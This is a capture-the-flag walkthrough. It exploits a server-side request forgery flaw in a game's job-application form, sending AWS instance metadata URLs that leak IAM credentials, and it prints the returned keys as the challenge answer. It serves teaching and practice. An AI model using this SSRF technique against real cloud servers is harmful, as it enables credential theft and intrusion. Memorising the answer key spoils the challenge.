10) Now Hiring!
The terminal challenge for this objective is the terminal "IMDS Exploration" offered by Noxious O. D'or. Solving this terminal challenge provides additional hints for this objective. To view the hints use the menu on the left.
To start this objective click on the Jack Frost Tower job applications server in the objective menu.
Click Apply on the main page. You will be taken to the application page. The Apply page has a field called "URL to your public NLBI report". This field is vulnerable to SSRF. In the field you will be putting a AWS IMDS query. The query will be ran by the server. The server will be returning the result in a jpeg file.
The first IMDS query to send is http://169.254.169.254/latest/meta-data/. Put this url in the above field, add a name to the name field and submit the application.
The server will return the results in a jpeg file. This file can be viewed in Firefox Developer tools under network.
Opening this jpeg file reveals the response from the server.
From the above results we can see available credentials for jf-deploy-role. Lets request the credentials via the IMDS query http://169.254.169.254/latest/meta-data/iam/security-credentials/jf-deploy-role.
The server returns the following results in the jpeg file:
{
"Code": "Success",
"LastUpdated": "2021-05-02T18:50:40Z",
"Type": "AWS-HMAC",
"AccessKeyId": "AKIA5HMBSK1SYXYTOXX6",
"SecretAccessKey": "CGgQcSdERePvGgr058r3PObPq3+0CfraKcsLREpX",
"Token": "NR9Sz/7fzxwIgv7URgHRAckJK0JKbXoNBcy032XeVPqP8/tWiR/KVSdK8FTPfZWbxQ==",
"Expiration": "2026-05-02T18:50:40Z"
}
Answer
CGgQcSdERePvGgr058r3PObPq3+0CfraKcsLREpX